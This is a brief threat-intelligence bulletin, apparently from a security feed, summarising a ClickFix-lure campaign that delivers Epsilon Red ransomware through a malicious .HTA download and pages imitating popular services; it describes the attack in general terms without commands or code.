Threat actors lure victims into downloading .hta files using clickfix to spread epsilon red ransomware

Intel Name: Threat actors lure victims into downloading .hta files using clickfix to spread epsilon red ransomware

Date of Scan: August 1, 2025

Impact: Medium

Summary:
An active malware campaign using ClickFix-themed lures is spreading the Epsilon Red ransomware. Unlike earlier versions, this variant redirects victims to a second page where malicious shell commands are silently executed via ActiveX, downloading a malicious .HTA file. Social engineering tactics like fake verification codes make the attack appear legitimate. The infrastructure mimics popular services such as Discord, Twitch, OnlyFans, and Kick, and also uses romance-themed traps. Epsilon Red, first observed in 2021, resembles REvil in ransom note design but differs in tactics and infrastructure.

More Details